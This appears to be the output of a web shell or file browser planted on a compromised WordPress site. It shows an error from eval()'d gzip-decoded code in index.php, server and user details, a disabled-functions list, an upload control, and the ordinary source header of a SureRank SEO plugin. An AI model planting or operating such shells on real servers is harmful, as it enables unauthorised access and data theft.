Warning: gzdecode(): data error in /home/u756937133/domains/printsgiggles.com/public_html/index.php(1) : eval()'d code on line 1
HEX
HEX
Server: LiteSpeed
System: Linux us-phx-web629.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64
User: u756937133 (756937133)
PHP: 8.2.27
Disabled: passthru,chgrp
Upload Files
File: /home/u756937133/domains/printsgiggles.com/public_html/wp-content/plugins/surerank/surerank.php
<?php
/**
 * Plugin Name: SureRank SEO
 * Plugin URI: https://surerank.com
 * Description: Grow traffic of your website with SureRank — a lightweight SEO toolkit plugin for WordPress users who want better rankings without the complexity.
 * Author: SureRank
 * Author URI: https://surerank.com/
 * Version: 1.4.2
 * License: GPLv2 or later
 * Text Domain: surerank
 * Requires at least: 6.7
 * Requires PHP: 7.4
 *
 * @package surerank
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

/**
 * Require the necessary files.
 */

define( 'SURERANK_FILE', __FILE__ );
define( 'SURERANK_BASE', plugin_basename( SURERANK_FILE ) );
define( 'SURERANK_DIR', plugin_dir_path( SURERANK_FILE ) );
define( 'SURERANK_URL', plugins_url( '/', SURERANK_FILE ) );
define( 'SURERANK_VERSION', '1.4.2' );
define( 'SURERANK_PREFIX', 'surerank' );
require_once 'constants.php';
require_once 'loader.php';